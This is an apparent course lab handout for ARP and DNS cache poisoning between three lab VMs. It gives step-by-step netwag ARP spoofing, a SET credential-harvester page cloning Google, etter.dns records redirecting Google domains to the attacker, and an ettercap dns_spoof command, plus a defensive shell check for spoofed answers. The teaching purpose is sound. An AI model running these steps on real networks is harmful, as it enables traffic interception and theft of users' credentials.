Lab 4 ARP and DNS Cache Poisoning v1.4

The ARP cache is an important part of the ARP protocol. Once a mapping between a MAC address and an IP address is resolved as the result of executing the ARP protocol, the mapping will be cached. Therefore, there is no need to repeat the ARP protocol if the mapping is already in the cache. However, because the ARP protocol is stateless, the cache can be easily poisoned by maliciously crafted ARP messages. Such an attack is called the ARP cache poisoning attack. In such an attack, attackers use s

ARP and DNS Cache Poisoning


Goal of this Lab:

In this lab we will be:

1. Using netwag to perform ARP cache poisoning
2. Using SET to take advantage of ARP cache poisoning
3. Using Ettercap to perform DNS cache poisoning
4. Using SET to take advantage of DNS cache poisoning

Pre-requisites for this lab:

1. Kali Linux VM
2. Debian Linux VM as a Client
3. Debian Linux VM as a Server

Document title: ARP and DNS Cache Poisoning


Version: 1.4 Document Created by Vuk Mutapovic & Pravesh Dahal
For any suggestion or issues regarding document please contact [email protected] or [email protected]
Table of Contents

ARP and DNS Cache Poisoning
Understanding TCP/IP based Attacks
    Lab Environment Setup
Task 1: ARP cache poisoning
    Step 1: Clear existing ARP table of client VM using the following command
    Step 2: Verify ARP table using the following command
    Step 3: Verify connectivity between client and server using ping
    Step 4: After verifying the connectivity, check the ARP table of client
    Step 5: Run apache2 on Server using the following command
    Student Task 1
    Step 6: Go to the client machine, open a browser and type the IP of the server
    Step 7: To perform ARP cache poisoning we will use netwag in Attacker VM
    Step 8: Specify the IP of the server and Run it
    Step 9: Verify the ARP cache of Client machine
    Step 10: Try to access apache2 webpage using the IP of the server
    Student Task 2
    Step 11: Run the following command to enable 2nd IP on eth0 on Attacker machine
    Student Task 3
Task 2: Using SET to take advantage of ARP cache poisoning
    Step 1: Use the following options once you run SET
    Student Task 4
    Step 2: After successfully running SET, go to the Client’s browser and type Server IP
    Student Task 5
    Step 3: Provide Email as Cyber and Password as Security
    Student Task 5
Task 3: DNS cache poisoning (DNS Spoofing)
    Student Task 6
    Ettercap
    Step 1: Use the following command to change the configuration of etter.dns
    Step 2: Navigate to the end of the file and insert the following
    Student Task 7
    Step 3: Clear the cache of Firefox and run Firefox in private window
    Step 4: Run Ettercap dns spoof using the following command
    Student Task 8
Task 4: Using SET to take advantage of DNS cache poisoning
    Step 1: Use the browser of Client machine and type the following
    Student Task 9
    Student Task 10

Understanding TCP/IP based Attacks

In this lab we will gain first-hand experience of TCP/IP vulnerabilities, as well as attacks against these vulnerabilities.
Vulnerabilities of the TCP/IP protocols occur at several layers. In this lab we will be exploiting ARP, which is a Layer 2
protocol, and DNS, which is a Layer 7 protocol.

Lab Environment Setup

To conduct this lab, we need 3 VMs connected in NAT Network. The tools being used for this lab are Netwox/Netwag,
Ettercap and SET.

Lab environment:

Server: 10.0.2.8
Attacker (Kali): 10.0.2.11
Client: 10.0.2.15

“Netwox is a toolbox for network administrators and network hackers.
Netwox contains several tools using network library netwib.
Netwox was successfully installed under Linux, Windows, FreeBSD, OpenBSD and Solaris.”

Reference: http://ntwox.sourceforge.net/

Task 1: ARP cache poisoning

The ARP cache is an important part of the ARP protocol. Once a mapping between a MAC address and an IP address
is resolved as the result of executing the ARP protocol, the mapping will be cached. Therefore, there is no need to
repeat the ARP protocol if the mapping is already in the cache. However, because the ARP protocol is stateless, the
cache can be easily poisoned by maliciously crafted ARP messages. Such an attack is called the ARP cache poisoning
attack.

Attackers may use spoofed ARP messages to trick the victim into accepting an invalid MAC-to-IP mapping and storing the
mapping in its cache. There can be various types of consequences depending on the motives of the attackers. For
example, attackers can launch a DoS attack against a victim by associating a non-existent MAC address with the IP
address of the victim’s default gateway; attackers can also redirect the traffic to and from the victim to another
machine, etc.

Step 1: Clear existing ARP table of client VM using the following command

sudo ip -s -s neigh flush all

Step 2: Verify ARP table using the following command

1) Install the net-tools package

sudo apt install net-tools

2) Verify ARP table

sudo arp -a

Step 3: Verify connectivity between client and server using ping

Step 4: After verifying the connectivity, check the ARP table of client.

sudo arp -a

You can see that the MAC address of the server has been mapped to the IP of the server in the ARP cache.

Step 5: Run apache2 on Server using the following command.

sudo service apache2 start

If you see an error that apache is not found, please install the Apache2 server using the following command

sudo apt install apache2

***********************************************************************************************

Student Task 1:
Provide the screenshot of the command:

***********************************************************************************************

Step 6: Go to the client machine, open a browser and type the IP of the server

Step 7: To perform ARP cache poisoning we will use netwag in Attacker VM.

1) Install netwag using the following command:

sudo apt install netwag


2) Start netwag:

sudo netwag

netwag, the GUI frontend of netwox, will open.

Step 8: Specify the IP of the server and Run it.

Step 9: Verify the ARP cache of Client machine

You can see that the IP of the server has been mapped to the MAC address of the Attacker machine. We have successfully
poisoned the ARP cache.

Step 10: Try to access apache2 webpage using the IP of the server.
You need to clear the cache and browser history of Firefox first. See this link for how to do it: LINK

***********************************************************************************************

Student Task 2:
Provide the screenshot of the output and briefly explain the output.

***********************************************************************************************

Step 11: Run the following command to enable 2nd IP on eth0 on Attacker machine

sudo ip addr add <IP of server>/24 dev eth0

***********************************************************************************************

Student Task 3:
Provide screenshot of the interface eth0 with 2 IPs.

Hint: The command is not ifconfig.

***********************************************************************************************

Task 2: Using SET to take advantage of ARP cache poisoning


Start SET using the following command

sudo setoolkit

Step 1: Use the following options once you run SET

- Social-Engineering Attacks
- Website Attack Vectors
- Credential Harvester Attack Method
- Web Templates
- Use the IP of Attacker
- Use Google as templates

***********************************************************************************************

Student Task 4:

Provide the screenshot of the final output.

***********************************************************************************************

Step 2: After successfully running SET, go to the Client’s browser and type Server IP

***********************************************************************************************

Student Task 5:
a) Briefly explain what you have noticed.
b) Provide screenshot.

***********************************************************************************************

Step 3: Provide Email as Cyber and Password as Security


Verify if you see similar output.

If yes, then congratulations: you have successfully redirected the web request that was meant for the server
to the attacker.
***********************************************************************************************

Student Task 5:
Now try with Email as Your name and Password as your learner number and provide screenshot below.

***********************************************************************************************

Task 3: DNS cache poisoning (DNS Spoofing)

“DNS spoofing, also referred to as DNS cache poisoning, is a form of computer security hacking in which corrupt
Domain Name System data is introduced into the DNS resolver's cache, causing the name server to return an
incorrect result record, e.g. an IP address. This results in traffic being diverted to the attacker's computer (or any
other computer).”

Reference: https://en.wikipedia.org/wiki/DNS_spoofing

***********************************************************************************************

Student Task 6:
Briefly explain what DNS is?

***********************************************************************************************

Ettercap

“Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. It can be used for
computer network protocol analysis and security auditing. It runs on various Unix-like operating systems including
Linux, Mac OS X, BSD and Solaris, and on Microsoft Windows. It is capable of intercepting traffic on a network
segment, capturing passwords, and conducting active eavesdropping against a number of common protocols. Its
original developers later founded Hacking Team.”

Reference: https://en.wikipedia.org/wiki/Ettercap_(software)

Web: https://www.ettercap-project.org/

Step 1: Use the following command to change the configuration of etter.dns

sudo nano /etc/ettercap/etter.dns

Step 2: Navigate to the end of the file and insert the following

*.google.co.in A <IP of Attacker>
mail.google.com A <IP of Attacker>
#*.google.com A <IP of Attacker>
google.com A <IP of Attacker>

#www.google.com PTR <IP of Attacker>
www.google.co.in PTR <IP of Attacker>

*.g00gle.com A <IP of Attacker>

Save and exit the file. By now you might have mastered it.

***********************************************************************************************

Student Task 7:
What will happen if you uncomment the 3rd line?

***********************************************************************************************

Step 3: Clear the cache of Firefox and run Firefox in private window.

Select Everything

Step 4: Run Ettercap dns spoof using the following command.

sudo ettercap -i eth0 -T -M arp -P dns_spoof /<IP of Client>///
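
While the spoof is active, the client resolves the Google names from etter.dns to the attacker's 10.0.2.x address, and that is something a defender can test for. The following is an added example, not part of the original lab handout: it reads resolver answers in "getent hosts" layout (address first, then name) and flags names outside an internal DNS suffix that resolve to private or loopback space. The suffix .lab.internal and all sample answers are constructed assumptions.

```shell
#!/bin/sh
# Added example: flag public names that resolve into private address space,
# the visible symptom of the etter.dns entries on the client.
# The internal suffix and the sample answers are constructed assumptions.

# stdin : lines in `getent hosts NAME` layout: "ADDRESS NAME"
# $1    : DNS suffix that is expected to resolve to private addresses
# stdout: "NAME ADDRESS" for every other name answered from RFC 1918
#         or loopback space
dns_private_answers() {
    awk -v suffix="$1" '
    function is_private(ip,   o) {
        if (split(ip, o, ".") != 4) return 0
        return (o[1] + 0 == 10) || (o[1] + 0 == 127) ||
               (o[1] + 0 == 172 && o[2] + 0 >= 16 && o[2] + 0 <= 31) ||
               (o[1] + 0 == 192 && o[2] + 0 == 168)
    }
    NF >= 2 {
        name = tolower($2)
        # A name counts as internal only if it ends with the given suffix.
        internal = (suffix != "" && length(name) >= length(suffix) &&
                    substr(name, length(name) - length(suffix) + 1) == suffix)
        if (!internal && is_private($1)) print name, $1
    }'
}

# Constructed answers as seen on the client during the spoof.
# 203.0.113.10 is a documentation address standing in for a public answer.
SAMPLE_ANSWERS='10.0.2.11 www.google.com
10.0.2.11 mail.google.com
10.0.2.8 server.lab.internal
203.0.113.10 example.com'

printf '%s\n' "$SAMPLE_ANSWERS" | dns_private_answers .lab.internal
```

The check is a heuristic: it catches a spoof that points at a LAN address, as in this lab, but not one that points at a public address.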

***********************************************************************************************

Student Task 8:
Provide the screenshot of the command entered.

***********************************************************************************************

Task 4: Using SET to take advantage of DNS cache poisoning

Step 1: Use the browser of Client machine and type the following

www.google.com

Enter the following:

Email: [email protected]

Password: Learner Number

***********************************************************************************************

Student Task 9:
Provide the screenshot of the terminal running SET with the credentials captured.

***********************************************************************************************

***********************************************************************************************

Student Task 10:


Use Ettercap to perform ARP cache poisoning and provide the steps and output.

***********************************************************************************************

Hope you enjoyed.


Now do some research on other types of TCP/IP attacks like ICMP redirect.
